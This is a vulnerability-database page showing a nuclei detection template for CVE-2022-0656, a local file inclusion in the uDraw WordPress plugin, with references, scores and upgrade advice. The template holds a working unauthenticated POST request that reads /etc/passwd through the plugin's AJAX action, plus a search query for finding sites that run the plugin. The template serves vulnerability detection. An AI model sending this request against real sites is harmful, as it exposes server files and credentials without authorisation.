Lucene search
K

uDraw <3.3.3 - Local File Inclusion

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

uDraw <3.3.3 - Local File Inclusion vulnerability allows unauthenticated users to read arbitrary files on the web server. Upgrading to version 3.3.3 or later is recommended

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0656
25 Apr 202216:16
attackerkb
Circl
CVE-2022-0656
25 Apr 202220:36
circl
CNNVD
WordPress plugin Web To Print Shop : uDraw 安全漏洞
25 Apr 202200:00
cnnvd
CNVD
WordPress plugin Web To Print Shop : uDraw arbitrary file reading vulnerability
27 Apr 202200:00
cnvd
CVE
CVE-2022-0656
25 Apr 202215:51
cve
Cvelist
CVE-2022-0656 uDraw < 3.3.3 - Unauthenticated Arbitrary File Access
25 Apr 202215:51
cvelist
NVD
CVE-2022-0656
25 Apr 202216:16
nvd
OSV
CVE-2022-0656
25 Apr 202216:16
osv
Patchstack
WordPress Web To Print Shop : uDraw plugin <= 3.3.32 - Unauthenticated Arbitrary File Access vulnerability
29 Mar 202200:00
patchstack
Prion
Code injection
25 Apr 202216:16
prion
Rows per page
id: CVE-2022-0656

info:
  name: uDraw <3.3.3 - Local File Inclusion
  author: akincibor
  severity: high
  description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0656
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-0656
    cwe-id: CWE-552
    epss-score: 0.07736
    epss-percentile: 0.93875
    cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webtoprint
    product: web_to_print_shop\
    google-query: inurl:"/wp-content/plugins/udraw"
  tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        action=udraw_convert_url_to_base64&url=/etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "cm9vd" # root in base64
          - "data:image\\/;base64"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200e7c8feb962023bf51032d36bd32d03dca19ab19ff2d9418ea812928060dabfe022100d2b5812cb0f3e29000891874d96b868264a3b7adf7eb2eabe79aedb7ef9c5e71:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.07736
26